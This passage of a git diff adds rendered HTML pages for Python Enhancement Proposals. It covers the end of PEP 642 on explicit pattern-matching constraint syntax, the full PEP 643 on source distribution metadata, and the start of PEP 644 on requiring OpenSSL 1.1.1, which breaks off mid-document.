While PEP 635 does emphasise several times that literal patterns and value +patterns are not full expressions, it doesn’t ever articulate a concrete benefit +that is obtained from that restriction (just a theoretical appeal to it being +useful to separate static checks from dynamic checks, which a code style +tool could still enforce, even if the compiler itself is more permissive).

+

The last time we imposed such a restriction was for decorator expressions and +the primary outcome of that was that users had to put up with years of awkward +syntactic workarounds (like nesting arbitrary expressions inside function calls +that just returned their argument) to express the behaviour they wanted before +the language definition was finally updated to allow arbitrary expressions and +let users make their own decisions about readability.

+

The situation in PEP 634 that bears a resemblance to the situation with decorator +expressions is that arbitrary expressions are technically supported in value +patterns, they just require awkward workarounds where either all the values to +match need to be specified in a helper class that is placed before the match +statement:

+
# Allowing arbitrary match targets with PEP 634's value pattern syntax
+class mt:
+    value = func()
+match expr:
+    case (_, mt.value):
+        ... # Handle the case where 'expr[1] == func()'
+
+
+

Or else they need to be written as a combination of a capture pattern and a +guard expression:

+
# Allowing arbitrary match targets with PEP 634's guard expressions
+match expr:
+    case (_, _matched) if _matched == func():
+        ... # Handle the case where 'expr[1] == func()'
+
+
+

This PEP proposes skipping requiring any such workarounds, and instead +supporting arbitrary value constraints from the start:

+
match expr:
+    case (__, == func()):
+        ... # Handle the case where 'expr == func()'
+
+
+

Whether actually writing that kind of code is a good idea would be a topic for +style guides and code linters, not the language compiler.

+

In particular, if static analysers can’t follow certain kinds of dynamic checks, +then they can limit the permitted expressions at analysis time, rather than the +compiler restricting them at compile time.

+

There are also some kinds of expressions that are almost certain to give +nonsensical results (e.g. yield, yield from, await) due to the +pattern caching rule, where the number of times the constraint expression +actually gets evaluated will be implementation dependent. Even here, the PEP +takes the view of letting users write nonsense if they really want to.

+

Aside from the recently updated decorator expressions, another situation where +Python’s formal syntax offers full freedom of expression that is almost never +used in practice is in except clauses: the exceptions to match against +almost always take the form of a simple name, a dotted name, or a tuple of +those, but the language grammar permits arbitrary expressions at that point. +This is a good indication that Python’s user base can be trusted to +take responsibility for finding readable ways to use permissive language +features, by avoiding writing hard to read constructs even when they’re +permitted by the compiler.

+

This permissiveness comes with a real concrete benefit on the implementation +side: dozens of lines of match statement specific code in the compiler is +replaced by simple calls to the existing code for compiling expressions +(including in the AST validation pass, the AST optimization pass, the symbol +table analysis pass, and the code generation pass). This implementation +benefit would accrue not just to CPython, but to every other Python +implementation looking to add match statement support.

+
+
+

Requiring the use of constraint prefix markers for mapping pattern keys

+

The initial (unpublished) draft of this proposal suggested requiring mapping +pattern keys be value constraints, just as PEP 634 requires that they be valid +literal or value patterns:

+
import constants
+
+match config:
+    case {== "route": route}:
+        process_route(route)
+    case {== constants.DEFAULT_PORT: sub_config, **rest}:
+        process_config(sub_config, rest)
+
+
+

However, the extra characters were syntactically noisy and unlike its use in +value constraints (where it distinguishes them from non-pattern expressions), +the prefix doesn’t provide any additional information here that isn’t already +conveyed by the expression’s position as a key within a mapping pattern.

+

Accordingly, the proposal was simplified to omit the marker prefix from mapping +pattern keys.

+

This omission also aligns with the fact that containers may incorporate both +identity and equality checks into their lookup process - they don’t purely +rely on equality checks, as would be incorrectly implied by the use of the +equality constraint prefix.

+
+
+

Allowing the key/value separator to be omitted for mapping value constraints

+

Instance attribute patterns allow the : separator to be omitted when +writing attribute value constraints like case object{.attr == expr}.

+

Offering a similar shorthand for mapping value constraints was considered, but +permitting it allows thoroughly baffling constructs like case {0 == 0}: +where the compiler knows this is the key 0 with the value constraint +== 0, but a human reader sees the tautological comparison operation +0 == 0. With the key/value separator included, the intent is more obvious to +a human reader as well: case {0: == 0}:

+
+
+
+

Reference Implementation

+

A draft reference implementation for this PEP [3] has been derived from Brandt +Bucher’s reference implementation for PEP 634 [4].

+

Relative to the text of this PEP, the draft reference implementation has not +yet complemented the special casing of several builtin and standard library +types in MATCH_CLASS with the more general check for __match_args__ +being set to None. Class defined patterns also currently still accept +classes that don’t define __match_args__.

+

All other modified patterns have been updated to follow this PEP rather than +PEP 634.

+

Unparsing for match patterns has not yet been migrated to the updated v3 AST.

+

The AST validator for match patterns has not yet been implemented.

+

The AST validator in general has not yet been reviewed to ensure that it is +checking that only expression nodes are being passed in where expression nodes +are expected.

+

The examples in this PEP have not yet been converted to test cases, so could +plausibly contain typos and other errors.

+

Several of the old PEP 634 tests are still to be converted to new SyntaxError +tests.

+

The documentation has not yet been updated.

+
+
+

Acknowledgments

+

The PEP 622 and PEP 634/PEP 635/PEP 636 authors, as the proposal in +this PEP is merely +an attempt to improve the readability of an already well-constructed idea by +proposing that starting with a more explicit syntax and potentially introducing +syntactic shortcuts for particularly common operations later is a better option +than attempting to only define the shortcut version. For areas of the +specification where the two PEPs are the same (or at least very similar), the +text describing the intended behaviour in this PEP is often derived directly +from the PEP 634 text.

+

Steven D’Aprano, who made a compelling case that the key goals of this PEP could +be achieved by using existing comparison tokens to tell the ability to override +the compiler when our guesses as to “what most users will want most of the time” +are inevitably incorrect for at least some users some of the time, and retaining +some of PEP 634’s syntactic sugar (with a slightly different semantic definition) +to obtain the same level of brevity as PEP 634 in most situations. (Paul +Sokolosvsky also independently suggested using == instead of ? as a +more easily understood prefix for equality constraints).

+

Thomas Wouters, whose publication of PEP 640 and public review of the structured +pattern matching proposals persuaded the author of this PEP to continue +advocating for a wildcard pattern syntax that a future PEP could plausibly turn +into a hard keyword that always skips binding a reference in any location a +simple name is expected, rather than continuing indefinitely as the match +pattern specific soft keyword that is proposed here.

+

Joao Bueno and Jim Jewett for nudging the PEP author to take a closer look at +the proposed syntax for subelement capturing within class patterns and mapping +patterns (particularly the problems with “capturing to the right”). This +review is what prompted the significant changes between v2 and v3 of the +proposal.

+
+
+

References

+ +
+
+

Appendix A – Full Grammar

+

Here is the full modified grammar for match_stmt, replacing Appendix A +in PEP 634.

+

Notation used beyond standard EBNF is as per PEP 534:

+
    +
  • 'KWD' denotes a hard keyword
  • +
  • "KWD" denotes a soft keyword
  • +
  • SEP.RULE+ is shorthand for RULE (SEP RULE)*
  • +
  • !RULE is a negative lookahead assertion
  • +
+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' [star_named_expressions]
+    | named_expression
+case_block: "case" (guarded_pattern | open_pattern) ':' block
+
+guarded_pattern: closed_pattern 'if' named_expression
+open_pattern: # Pattern may use multiple tokens with no closing delimiter
+    | as_pattern
+    | or_pattern
+
+as_pattern: [closed_pattern] pattern_as_clause
+as_pattern_with_inferred_wildcard: pattern_as_clause
+pattern_as_clause: 'as' pattern_capture_target
+pattern_capture_target: !"__" NAME !('.' | '(' | '=')
+
+or_pattern: '|'.simple_pattern+
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+value_constraint:
+    | eq_constraint
+    | id_constraint
+
+eq_constraint: '==' closed_expr
+id_constraint: 'is' closed_expr
+
+closed_expr: # Require a single token or a closing delimiter in expression
+    | primary
+    | closed_factor
+
+closed_factor: # "factor" is the main grammar node for these unary ops
+    | '+' primary
+    | '-' primary
+    | '~' primary
+
+closed_pattern: # Require a single token or a closing delimiter in pattern
+    | wildcard_pattern
+    | group_pattern
+    | structural_constraint
+
+wildcard_pattern: "__"
+
+group_pattern: '(' open_pattern ')'
+
+structural_constraint:
+    | sequence_constraint
+    | mapping_constraint
+    | attrs_constraint
+    | class_constraint
+
+sequence_constraint: '[' [sequence_constraint_elements] ']'
+sequence_constraint_elements: ','.sequence_constraint_element+ ','?
+sequence_constraint_element:
+    | star_pattern
+    | simple_pattern
+    | as_pattern_with_inferred_wildcard
+star_pattern: '*' (pattern_as_clause | wildcard_pattern)
+
+mapping_constraint: '{' [mapping_constraint_elements] '}'
+mapping_constraint_elements: ','.key_value_constraint+ ','?
+key_value_constraint:
+    | closed_expr pattern_as_clause
+    | closed_expr ':' simple_pattern
+    | double_star_capture
+double_star_capture: '**' pattern_as_clause
+
+attrs_constraint:
+    | name_or_attr '{' [attrs_constraint_elements] '}'
+name_or_attr: attr | NAME
+attr: name_or_attr '.' NAME
+attrs_constraint_elements: ','.attr_value_constraint+ ','?
+attr_value_constraint:
+    | '.' NAME pattern_as_clause
+    | '.' NAME value_constraint
+    | '.' NAME ':' simple_pattern
+    | '.' NAME
+
+class_constraint:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' positional_patterns ','? ')'
+    | name_or_attr '(' class_constraint_attrs ')'
+    | name_or_attr '(' positional_patterns ',' class_constraint_attrs] ')'
+positional_patterns: ','.positional_pattern+
+positional_pattern:
+    | simple_pattern
+    | as_pattern_with_inferred_wildcard
+class_constraint_attrs:
+    | '**' '{' [attrs_constraint_elements] '}'
+
+
+
+
+

Appendix B: Summary of Abstract Syntax Tree changes

+

The following new nodes are added to the AST by this PEP:

+
stmt = ...
+      | ...
+      | Match(expr subject, match_case* cases)
+      | ...
+      ...
+
+match_case = (pattern pattern, expr? guard, stmt* body)
+
+pattern = MatchAlways
+     | MatchValue(matchop op, expr value)
+     | MatchSequence(pattern* patterns)
+     | MatchMapping(expr* keys, pattern* patterns)
+     | MatchAttrs(expr cls, identifier* attrs, pattern* patterns)
+     | MatchClass(expr cls, pattern* patterns, identifier* extra_attrs, pattern* extra_patterns)
+
+     | MatchRestOfSequence(identifier? target)
+     -- A NULL entry in the MatchMapping key list handles capturing extra mapping keys
+
+     | MatchAs(pattern? pattern, identifier target)
+     | MatchOr(pattern* patterns)
+
+      attributes (int lineno, int col_offset, int? end_lineno, int? end_col_offset)
+
+matchop = EqCheck | IdCheck
+
+
+
+
+

Appendix C: Summary of changes relative to PEP 634

+

The overall match/case statement syntax and the guard expression syntax +remain the same as they are in PEP 634.

+

Relative to PEP 634 this PEP makes the following key changes:

+
    +
  • a new pattern type is defined in the AST, rather than reusing the expr +type for patterns
  • +
  • the new MatchAs and MatchOr AST nodes are moved from the expr +type to the pattern type
  • +
  • the wildcard pattern changes from _ (single underscore) to __ (double +underscore), and gains a dedicated MatchAlways node in the AST
  • +
  • due to ambiguity of intent, value patterns and literal patterns are removed
  • +
  • a new expression category is introduced: “closed expressions”
  • +
  • closed expressions are either primary expressions, or a closed expression +preceded by one of the high precedence unary operators (+, -, ~)
  • +
  • a new pattern type is introduced: “value constraint patterns”
  • +
  • value constraints have a dedicated MatchValue AST node rather than +allowing a combination of Constant (literals), UnaryOp +(negative numbers), BinOp (complex numbers), and Attribute (attribute +lookups)
  • +
  • value constraint patterns are either equality constraints or identity constraints
  • +
  • equality constraints use == as a prefix marker on an otherwise +arbitrary closed expression: == EXPR
  • +
  • identity constraints use is as a prefix marker on an otherwise +arbitrary closed expression: is EXPR
  • +
  • due to ambiguity of intent, capture patterns are removed. All capture operations +use the as keyword (even in sequence matching) and are represented in the +AST as either MatchAs or MatchRestOfSequence nodes.
  • +
  • to reduce verbosity in AS patterns, as NAME is permitted, with the same +meaning as __ as NAME
  • +
  • sequence patterns change to require the use of square brackets, rather than +offering the same syntactic flexibility as assignment targets (assignment +statements allow iterable unpacking to be indicated by any use of a tuple +separated target, with or without surrounding parentheses or square brackets)
  • +
  • sequence patterns gain a dedicated MatchSequence AST node rather than +reusing List
  • +
  • mapping patterns change to allow arbitrary closed expressions as keys
  • +
  • mapping patterns gain a dedicated MatchMapping AST node rather than +reusing Dict
  • +
  • to reduce verbosity in mapping patterns, KEY : __ as NAME may be shortened +to KEY as NAME
  • +
  • class patterns no longer use individual keyword argument syntax for attribute +matching. Instead they use double-star syntax, along with a variant on mapping +pattern syntax with a dot prefix on the attribute names
  • +
  • class patterns gain a dedicated MatchClass AST node rather than +reusing Call
  • +
  • to reduce verbosity, class attribute matching allows : to be omitted when +the pattern to be matched starts with ==, is, or as
  • +
  • class patterns treat any class that sets __match_args__ to None as +accepting a single positional pattern that is matched against the entire +object (avoiding the special casing required in PEP 634)
  • +
  • class patterns raise TypeError when used with an object that does not +define __match_args__
  • +
  • dedicated syntax for ducktyping is added, such that case cls{...}: is +roughly equivalent to case cls(**{...}):, but skips the check for the +existence of __match_args__. This pattern also has a dedicated AST node, +MatchAttrs
  • +
+

Note that postponing literal patterns also makes it possible to postpone the +question of whether we need an “INUMBER” token in the tokeniser for imaginary +literals. Without it, the parser can’t distinguish complex literals from other +binary addition and subtraction operations on constants, so proposals like +PEP 634 have to do work in later compilation steps to check for correct usage.

+
+
+

Appendix D: History of changes to this proposal

+

The first published iteration of this proposal mostly followed PEP 634, but +suggested using ?EXPR for equality constraints and ?is EXPR for +identity constraints rather than PEP 634’s value patterns and literal patterns.

+

The second published iteration mostly adopted a counter-proposal from Steven +D’Aprano that kept the PEP 634 style inferred constraints in many situations, +but also allowed the use of == EXPR for explicit equality constraints, and +is EXPR for explicit identity constraints.

+

The third published (and current) iteration dropped inferred patterns entirely, +in an attempt to resolve the concerns with the fact that the patterns +case {key: NAME}: and case cls(attr=NAME): would both bind NAME +despite it appearing to the right of another subexpression without using the +as keyword. The revised proposal also eliminates the possibility of writing +case TARGET1 as TARGET2:, which would bind to both of the given names. Of +those changes, the most concerning was case cls(attr=TARGET_NAME):, since it +involved the use of = with the binding target on the right, the exact +opposite of what happens in assignment statements, function calls, and +function signature declarations.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0642.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0643/index.html b/pep-0643/index.html new file mode 100644 index 00000000000..0e3f7ed702f --- /dev/null +++ b/pep-0643/index.html @@ -0,0 +1,312 @@ + + + + + + + + PEP 643 – Metadata for Package Source Distributions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 643 – Metadata for Package Source Distributions

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
BDFL-Delegate:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Oct-2020
+
Post-History:
+
24-Oct-2020, 01-Nov-2020, 02-Nov-2020, 14-Nov-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

Python package metadata is stored in the distribution file in a standard +format, defined in the Core Metadata Specification. However, for +source distributions, while the format of the data is defined, there has +traditionally been a lot of inconsistency in what data is recorded in +the source distribution. See here +for a discussion of this issue.

+

As a result, metadata consumers are unable to rely on the data available +from source distributions, and need to use the (costly) PEP 517 build +mechanisms to extract medatata.

+

This PEP defines a standard that allows build backends to reliably store +package metadata in the source distribution, while still retaining the +necessary flexibility to handle metadata fields that have to be calculated +at build time.

+
+
+

Motivation

+

There are a number of issues with the way that metadata is currently +stored in source distributions:

+
    +
  • The details of how to store metadata, while standardised, are not +easy to find.
  • +
  • The specification requires an old metadata version, and has not been +updated in line with changes to the core metadata spec.
  • +
  • There is no way in the spec to distinguish between “this field has been +omitted because its value will not be known until build time” and “this +field does not have a value”.
  • +
  • The core metadata specification allows most fields to be optional, +meaning that the previous issue affects nearly every metadata field.
  • +
+

This PEP proposes an update to the metadata specification to allow +recording of fields which are expected to be “filled in later”, and +updates the source distribution specification to clarify that backends +should record sdist metadata using that version of the spec (or later).

+
+
+

Rationale

+

This PEP allows projects to define source distribution metadata values +as being “dynamic”. In this context, saying that a field is “dynamic” +means that the value has not been fixed at the time that the source +distribution was generated. Dynamic values will be supplied by the build +backend at the time when the wheel is generated, and could depend on +details of the build environment.

+

PEP 621 has a similar concept, of “dynamic” values that will be +“filled in later”, and so we choose to use the same term here by +analogy.

+
+
+

Specification

+

This PEP defines the relationship between metadata values specified in a +source distribution, and the corresponding values in wheels built from +it. It requires build backends to clearly mark any fields which will +not simply be copied unchanged from the sdist to the wheel.

+

In addition, this PEP makes the PyPA Specifications document the +canonical location for the specification of the source distribution +format (collecting the information in PEP 517 and in this PEP).

+

A new field, Dynamic, will be added to the Core Metadata Specification. +This field will be multiple use, and will be allowed to contain the name +of another core metadata field.

+

When found in the metadata of a source distribution, the following +rules apply:

+
    +
  1. If a field is not marked as Dynamic, then the value of the field +in any wheel built from the sdist MUST match the value in the sdist. +If the field is not in the sdist, and not marked as Dynamic, then +it MUST NOT be present in the wheel.
  2. +
  3. If a field is marked as Dynamic, it may contain any valid value in +a wheel built from the sdist (including not being present at all).
  4. +
  5. Backends MUST NOT mark a field as Dynamic if they can determine that +it was generated from data that will not change at build time.
  6. +
+

Backends MAY record the value they calculated for a field they mark as +Dynamic in a source distribution. Consumers, however, MUST NOT treat +this value as canonical, but MAY use it as an hint about what the final +value in a wheel could be.

+

In any context other than a source distribution, if a field is marked as +Dynamic, that indicates that the value was generated at wheel build +time and may not match the value in the sdist (or in other builds of the +project). Backends are not required to record this information, though, +and consumers MUST NOT assume that the lack of a Dynamic marking has +any significance, except in a source distribution.

+

The fields Name and Version MUST NOT be marked as Dynamic.

+

As it adds a new metadata field, this PEP updates the core metadata +format to version 2.2.

+

Source distributions SHOULD use the latest version of the core metadata +specification that was available when they were created.

+

Build backends are strongly encouraged to only mark fields as +Dynamic when absolutely necessary, and to encourage projects to +avoid backend features that require the use of Dynamic. Projects +should prefer to use environment markers on static values to adapt to +details of the install location.

+
+
+

Backwards Compatibility

+

As this proposal increments the core metadata version, it is compatible +with existing source distributions, which will use an older metadata +version. Tools can determine whether a source distribution conforms to +this PEP by checking the metadata version.

+
+
+

Security Implications

+

As this specification is purely for the storage of data that is intended +to be publicly available, there are no security implications.

+
+
+

How to Teach This

+

This is a data storage format for project metadata, and so will not +typically be visible to end users. There is therefore no need to teach +users how to use the format. Developers wanting to reference the +metadata will be able to find the details in the PyPA Specifications.

+
+
+

Rejected Ideas

+
    +
  1. Rather than marking fields as Dynamic, fields should be assumed +to be dynamic unless explicitly marked as Static.

    This is logically equivalent to the current proposal, but it implies +that fields being dynamic is the norm. Packaging tools can be much +more efficient in the presence of metadata that is known to be static, +so the PEP chooses to make dynamic fields the exception, and require +backends to “opt in” to making a field dynamic.

    +

    In addition, if dynamic is the default, then in future, as more +and more metadata becomes static, metadata files will include an +increasing number of Static declarations.

    +
  2. +
  3. Rather than having a Dynamic field, add a special value that +indicates that a field is “not yet defined”.

    Again, this is logically equivalent to the current proposal. It makes +“being dynamic” an explicit choice, but requires a special value. As +some fields can contain arbitrary text, choosing a such a value is +somewhat awkward (although likely not a problem in practice). There +does not seem to be enough benefit to this approach to make it worth +using instead of the proposed mechanism.

    +
  4. +
  5. Special handling of Requires-Python.

    Early drafts of the PEP needed special discussion of Requires-Python, +because the lack of environment markers for this field meant that it might +be difficult to require it to be static. The final form of the PEP no longer +needs this, as the idea of a whitelist of fields allowed to be dynamic was +dropped.

    +
  6. +
  7. Restrict the use of Dynamic to a minimal “white list” of +permitted fields.

    This approach was likely to prove extremely difficult for setuptools +to implement in a backward compatible way, due to the dynamic nature +of the setuptools interface. Instead, the proposal now allows most +fields to be dynamic, but encourages backends to avoid dynamic values +unless essential.

    +
  8. +
+
+
+

Open Issues

+

None

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0643.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0644/index.html b/pep-0644/index.html new file mode 100644 index 00000000000..705a7011714 --- /dev/null +++ b/pep-0644/index.html @@ -0,0 +1,520 @@ + + + + + + + + PEP 644 – Require OpenSSL 1.1.1 or newer | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 644 – Require OpenSSL 1.1.1 or newer

+
+
Author:
+
Christian Heimes <christian at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
27-Oct-2020, 03-Mar-2021, 17-Mar-2021, 17-Apr-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes for CPython’s standard library to support only OpenSSL +1.1.1 LTS or newer. Support for OpenSSL versions past end-of-lifetime, +incompatible forks, and other TLS libraries are dropped.

+
+
+

Motivation

+

Python makes use of OpenSSL in hashlib, hmac, and ssl modules. OpenSSL +provides fast implementations of cryptographic primitives and a full TLS +stack including handling of X.509 certificates. The ssl module is used by +standard library modules like urllib and 3rd party modules like urllib3 +to implement secure variants of internet protocols. pip uses the ssl +module to securely download packages from PyPI. Any bug in the ssl module’s +bindings to OpenSSL can lead to a severe security issue.

+

Over time OpenSSL’s public API has evolved and changed. Version 1.0.2 +introduced new APIs to verify and match hostnames. OpenSSL 1.1.0 made +internal structs opaque and introduced new APIs that replace direct access of +struct members. Version 3.0.0 will deprecate more APIs due to internal +reorganization that moves cryptographic algorithms out of the core and into +providers. Forks like LibreSSL and BoringSSL have diverged in different +directions.

+

Currently Python versions 3.6 to 3.9 are compatible with OpenSSL 1.0.2, +1.1.0, and 1.1.1. For the most part Python also works with LibreSSL >= 2.7.1 +with some missing features and broken tests.

+

Due to limited resources and time it becomes increasingly hard to support +multiple versions and forks as well as test and verify correctness. Besides +multiple incompatible APIs there are build time flags, +distribution-specific patches, and local crypto-policy settings that add to +plethora of combinations. On the other hand, the Python core team has only +a couple of domain experts who are familiar with TLS and OpenSSL internals +and even fewer who are active maintainers.

+

Requiring OpenSSL 1.1.1 would allow us to give the vast majority of users a +better experience, reduce our maintenance overhead and thus free resources +to implement new features. Users would be able to rely on the presence of +new features and consistent behavior, ultimately resulting in a more robust +experience.

+
+
+

Impact

+

OpenSSL 1.1.1 is the default variant and version of OpenSSL on almost all +supported platforms and distributions. It’s also the only version that still +receives security support from upstream [9].

+

No macOS and Windows user will be affected by the deprecation. The python.org +installer and alternative distributions like Conda ship with most recent +OpenSSL version.

+

As of October 2020 and according to DistroWatch [1] most current BSD and +Linux distributions ship with OpenSSL 1.1.1 as well. Some older releases of +long-term support (LTS) and enterprise distributions have older versions of +OpenSSL or LibreSSL. By the time Python 3.10 will be generally available, +several of these distributions will have reached end of lifetime, end of +general support, or moved from LibreSSL to OpenSSL.

+

Other software has dropped support for OpenSSL 1.0.2 as well. For example, +PyCA cryptography 3.2 (2020-10-25) removed compatibility with OpenSSL 1.0.2.

+
+

OpenSSL 1.0.2 LTS

+

released: 2015-02 +end of lifetime: 2019-12

+

OpenSSL 1.0.2 added hostname verification, ALPN support, and elliptic curves.

+
    +
  • CentOS 7 (EOL 2024-06)
  • +
  • Debian 8 Jessie (EOL 2020-07)
  • +
  • Linux Mint 18.3 (EOL 2021-04)
  • +
  • RHEL 7 (full support ends 2019-08, maintenance 2 support ends 2024-06)
  • +
  • SUSE Enterprise Linux 12-SP5 (general supports ends 2024-10)
  • +
  • Ubuntu 16.04 LTS / Xenial (general support ends 2021-04)
  • +
+
+
+

OpenSSL 1.1.0

+

released: 2016-08 +end of lifetime: 2019-09

+

OpenSSL 1.1.0 removed or disabled insecure ciphers by default and added +support for ChaCha20-Poly1305, BLAKE2 (basic features), X25519 and CT. The +majority of structs were made opaque and new APIs were introduced. OpenSSL +1.1.0 is not API compatible with 1.0.2.

+
    +
  • Debian 9 Stretch (security support ended 2020-07, LTS until 2022-06)
  • +
  • Ubuntu 18.04 LTS / Bionic (general support ends 2023-04)
  • +
+
+
+

OpenSSL 1.1.1 LTS

+

released: 2018-08 +end of lifetime: 2023-09 (planned)

+

OpenSSL 1.1.1 added TLS 1.3, SHA-3, X448 and Ed448.

+
    +
  • Alpine (switched back to OpenSSL in 2018 [4])
  • +
  • Arch Linux current
  • +
  • CentOS 8.0+
  • +
  • Debian 10 Buster
  • +
  • Debian 11 Bullseye (ETA 2021-06)
  • +
  • Fedora 29+
  • +
  • FreeBSD 11.3+
  • +
  • Gentoo Linux stable (dropped LibreSSL as alternative in January 2021 [10])
  • +
  • HardenedBSD (switched back to OpenSSL in 2018 [3])
  • +
  • Linux Mint 19.3+
  • +
  • macOS (python.org installer)
  • +
  • NetBSD 8.2+
  • +
  • openSUSE 15.2+
  • +
  • RHEL 8.0+
  • +
  • Slackware current
  • +
  • SUSE Enterprise Linux 15-SP2
  • +
  • Ubuntu 18.10+
  • +
  • Ubuntu 20.04 LTS / Focal
  • +
  • VoidLinux (switched back to OpenSSL in March 2021 [5])
  • +
  • Windows (python.org installer, Conda)
  • +
+

Major CI providers provide images with OpenSSL 1.1.1.

+
    +
  • AppVeyor (with image Ubuntu2004)
  • +
  • CircleCI (with recent cimg/base:stable or cimg/base:stable-20.04)
  • +
  • GitHub Actions (with runs-on: ubuntu-20.04)
  • +
  • Giblab CI (with Debian Stretch, Ubuntu Focal, CentOS 8, RHEL 8, or Fedora +runner)
  • +
  • Packit
  • +
  • TravisCI (with dist: focal)
  • +
  • Zuul
  • +
+
+
+

OpenSSL 3.0.0

+

released: n/a (planned for mid/late 2021)

+

OpenSSL 3.0.0 is currently under development. Major changes include +relicensing to Apache License 2.0 and a new API for cryptographic algorithms +providers. Most changes are internal refactorings and don’t affect public +APIs. [8]

+
+
+

LibreSSL

+

created: 2014-04 (forked from OpenSSL 1.0.1g)

+
    +
  • DragonFly BSD
  • +
  • Hyperbola GNU/Linux-libre
  • +
  • OpenBSD
  • +
  • OpenELEC (discontinued)
  • +
  • TrueOS (discontinued)
  • +
+

Some distributions like FreeBSD and OPNsense also feature LibreSSL +instead of OpenSSL as non-standard TLS libraries. Gentoo discontinued +LibreSSL as an alternative to OpenSSL in January 2021 [10] due to +compatibility issues and little testing.

+

OpenBSD ports has a port security/openssl/1.1 which is documented as +“[…] is present to provide support for applications which cannot be made +compatible with LibReSSL” [7]. The package could be used by OpenBSD to +provide a working ssl module.

+
+
+

BoringSSL

+

created: 2014-06

+

BoringSSL is Google’s fork of OpenSSL. It’s not intended for general use and +therefore not supported by Python. There are no guarantees of API or ABI +stability. Vendored copies of BoringSSL are used in Chrome/Chromium browser, +Android, and on Apple platforms [6].

+
+
+
+

Benefits

+
+

TLS 1.3

+

OpenSSL 1.1.1 introduced support for the new TLS 1.3 version. The latest +version of the TLS protocol has a faster handshake and is more secure than +the previous versions.

+
+
+

Thread and fork safety

+

Starting with release 1.1.0c, OpenSSL is fully fork and thread safe. +Bindings no longer need any workarounds or additional callbacks to support +multithreading.

+
+
+

SHA-3

+

Since 1.1.0, OpenSSL ships with SHA-3 and SHAKE implementations. +Python’s builtin SHA-3 support is based on the reference implementation. The +internal _sha3 code is fairly large and the resulting shared library close +to 0.5 MB. Python could drop the builtin implementation and rely on OpenSSL’s +libcrypto instead.

+

So far LibreSSL upstream development has refused to add SHA-3 support. [2]

+
+
+
+

Compatibility

+
+

OpenSSL downstream patches and options

+

OpenSSL features more than 70 configure and build time options in the form +of OPENSSL_NO_* macros. Around 60 options affect the presence of features +like cryptographic algorithms and TLS versions. Some distributions apply +patches to alter settings. Furthermore, default values for settings like +security level, ciphers, TLS version range, and signature algorithms can +be set in OpenSSL config file.

+

The Python core team lacks resources to test all possible combinations. +This PEP proposes that Python only supports OpenSSL builds that have +standard features enabled. Vendors shall disable deprecated or insecure +algorithms and TLS versions with build time options like +OPENSSL_NO_TLS1_1_METHOD or OpenSSL config options like +MinProtocol = TLSv1.2.

+

Python assumes that OpenSSL is built with

+
    +
  • hashlib’s default algorithms such as MD5, SHA-1, SHA-2 family, +SHA-3/SHAKE family, BLAKE2
  • +
  • TLS 1.2 and TLS 1.3 protocols
  • +
  • current key agreement, signature, and encryption algorithms for TLS 1.2 +and 1.3 (ECDH, RSA, ECDSA, Curve25519, AES, Poly1309-ChaCha20, …)
  • +
  • threading, file I/O, socket I/O, and error messages
  • +
+

Weak algorithms (MD5, SHA-1 signatures) and short keys (RSA < 2024 bits) may +be disabled at runtime. Algorithms may also be blocked when they are +disabled by a crypto policy such as FIPS. The PEP is not more specific on +purpose to give room for new features as well as countermeasures against +vulnerabilities. As a rule of thumb, Python should be able to connect to +PyPI and the test suite should pass.

+
+
+

LibreSSL support

+

LibreSSL is a fork of OpenSSL. The fork was created off OpenSSL 1.0.1g by +members of the OpenBSD team in 2014 in light of the heartbleed vulnerability. +Since its inception several features deemed problematic or insecure were +removed or replaced (SSL 2.0, SSL 3.0, improved CPRNG) or backported +from OpenSSL and BoringSSL.

+

At the moment LibreSSL is not fully API compatible with OpenSSL 1.1.1. The +latest release LibreSSL 3.3.2 is missing features and behaves differently +in some cases. Mentionable missing or incompatible features include

+
    +
  • SHA-3, SHAKE, BLAKE2
  • +
  • SSL_CERT_* environment variables
  • +
  • security level APIs
  • +
  • session handling APIs
  • +
  • key logging API
  • +
  • verified cert chain APIs
  • +
  • OPENSSL_VERSION macro
  • +
+

This PEP proposed to remove any and all LibreSSL related workarounds from +Python. In the future Python will not actively prohibit LibreSSL support +with configure and compile time checks. But Python will not accept patches +that add non-trivial workarounds or disable tests either.

+
+
+

BoringSSL

+

There are currently no plans to support BoringSSL.

+
+
+
+

Rejected Ideas

+
+

Formalize supported OpenSSL versions

+

This PEP does not provide a set of formal rules and conditions under which +an OpenSSL version is supported.

+

In general Python aims to be compatible with commonly used and officially +supported OpenSSL versions. Patch releases of Python may not be compatible +with new major releases of OpenSSL. Users should not expect that a new major +or minor release of Python works with an OpenSSL version that is past its +end-of-lifetime. Python core development may backport fixes for new releases +or extend compatibility with EOLed releases as we see fit.

+

The new ABI stability and LTS policies of OpenSSL [9] should help, too.

+
+
+

Keep support for OpenSSL 1.1.0

+

